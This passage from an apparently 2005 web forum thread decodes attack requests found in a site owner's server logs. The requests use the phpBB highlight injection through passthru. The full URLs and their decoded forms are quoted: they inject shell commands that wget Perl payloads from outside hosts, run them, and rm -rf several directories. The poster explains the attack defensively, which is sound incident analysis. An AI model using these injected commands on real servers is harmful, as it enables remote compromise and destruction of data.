4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
    is
    GET /showthread.php?t=8240&rush=echo _START_; cd /tmp; rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/tmp/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/spool/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd  /usr/local/apache/proxy/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527
    
    GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';
    is
    GET /printthread.php?t=440&rush=echo _START_; cd /tmp; wget security.cnc.net/bot.txt;wget security.cnc.net/worm.txt;perl worm.txt;rm worm.txt;perl bot.txt;rm bot.txt; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527';
    if run it does try to download a file into dirs and run it
    in your case the try on "/usr/local/apache/proxy/" did work
    so you got the files in there, unfortunatelly none of the URL's above works, so cant find out what the perl scripts do, guess download more files and do something else
    someone might have used this script to exploit you
    http://www.k-otik.com/exploits/20041...pbb2010.pl.php

    your sure its vbb 3.0.5? looks like the phpbb highlight exploit code
    Last edited by sehe; 01-12-2005 at 03:26 PM.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •